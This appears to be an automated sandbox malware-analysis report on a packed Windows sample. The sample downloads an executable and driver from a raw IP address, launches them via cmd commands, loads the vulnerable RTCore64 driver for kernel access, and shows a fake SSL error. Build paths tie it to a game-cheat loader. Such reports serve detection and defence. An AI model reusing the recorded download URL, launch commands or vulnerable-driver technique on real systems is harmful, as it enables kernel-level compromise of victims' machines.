Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://keyauth.win/api/1.2/
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://keyauth.win/api/1.2/2(f
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://keyauth.win/api/1.2/http://185.101.104.122/Vulnerability.exeC:
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: Iyto7FYCJO.exe, 00000000.00000002.2223557132.00007FF7A27F2000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.behance.net/madetypeFree
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/03

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710

Source: unknown

HTTPS traffic detected: 172.67.72.57:443 -> 192.168.2.5:49710 version: TLS 1.2

Installs a raw input device (often for capturing keystrokes)

Source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E945000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: NtUserGetRawInputData

memstr_6d72b45d-7

System Summary

Detected VMProtect packer

Source: Iyto7FYCJO.exe

Static PE information: .vmp0 and .vmp1 section names

Contains functionality to call native functions

Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E6810 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,VirtualFree,DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,memset,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,VirtualFree,		5_2_00007FF7738E6810
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F32C0 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,VirtualFree,_stricmp,VirtualFree,VirtualFree,_invalid_parameter_noinfo_noreturn,		5_2_00007FF7738F32C0

Contains functionality to communicate with device drivers

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738E45E0: LoadLibraryA,LoadLibraryA,_dupenv_s,_invalid_parameter_noinfo_noreturn,free,SymFromName,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_time64,GetCurrentThreadId,srand,rand,rand,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,memset,?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z,??7ios_base@std@@QEBA_NXZ,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,CreateFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,SymUnloadModule64,SymCleanup,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

5_2_00007FF7738E45E0

Creates driver files

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys

Jump to behavior

Creates files inside the system directory

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\Vulnerability.exe	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\driver.sys	Jump to behavior
Source: C:\Windows\Vulnerability.exe	File created: C:\Windows\symbols\	Jump to behavior

Detected potential crypto function

Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E3CE0	5_2_00007FF7738E3CE0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E1330	5_2_00007FF7738E1330
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F1630	5_2_00007FF7738F1630
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E45E0	5_2_00007FF7738E45E0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E6440	5_2_00007FF7738E6440
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738EFBF0	5_2_00007FF7738EFBF0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E6810	5_2_00007FF7738E6810
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E5010	5_2_00007FF7738E5010
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F3B60	5_2_00007FF7738F3B60
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E72B0	5_2_00007FF7738E72B0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E7EA0	5_2_00007FF7738E7EA0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F32C0	5_2_00007FF7738F32C0

Found potential string decryption / allocating functions

Source: C:\Windows\Vulnerability.exe

Code function: String function: 00007FF7738EA3C0 appears 102 times

One or more processes crash

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1308 -s 1708

Source: driver[1].sys.0.dr	Binary string: \Device\{83040329-923403830}
Source: Vulnerability.exe.0.dr	Binary string: \Device\PhysicalMemory
Source: Vulnerability.exe.0.dr	Binary string: 0\DosDevices\RTCore64\Device\RTCore64

Source: classification engine

Classification label: mal100.expl.evad.winEXE@25/5@1/3

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,

5_2_00007FF7738F14C0

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\60023779-100a-4137-a2cb-f060494dee00

Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Iyto7FYCJO.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\Iyto7FYCJO.exe "C:\Users\user\Desktop\Iyto7FYCJO.exe"
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Source: C:\Windows\Vulnerability.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 \| find /i /v "md5" \| find /i /v "certutil"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "md5"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "certutil"
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1308 -s 1708
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 \| find /i /v "md5" \| find /i /v "certutil"	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sys	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "md5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "certutil"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5	Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Iyto7FYCJO.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Iyto7FYCJO.exe

Static file information: File size 6070784 > 1048576

Source: Iyto7FYCJO.exe

Static PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x5c9a00

Source: Iyto7FYCJO.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mbols/wi.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: Iyto7FYCJO.exe, 00000000.00000003.2159382259.0000022AC022F000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, driver.sys.0.dr, driver[1].sys.0.dr
Source:	Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb`2 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbW source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69D00D000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106140610.000002B69E957000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69D030000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1V source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5.sysF source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdbE140.dll source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
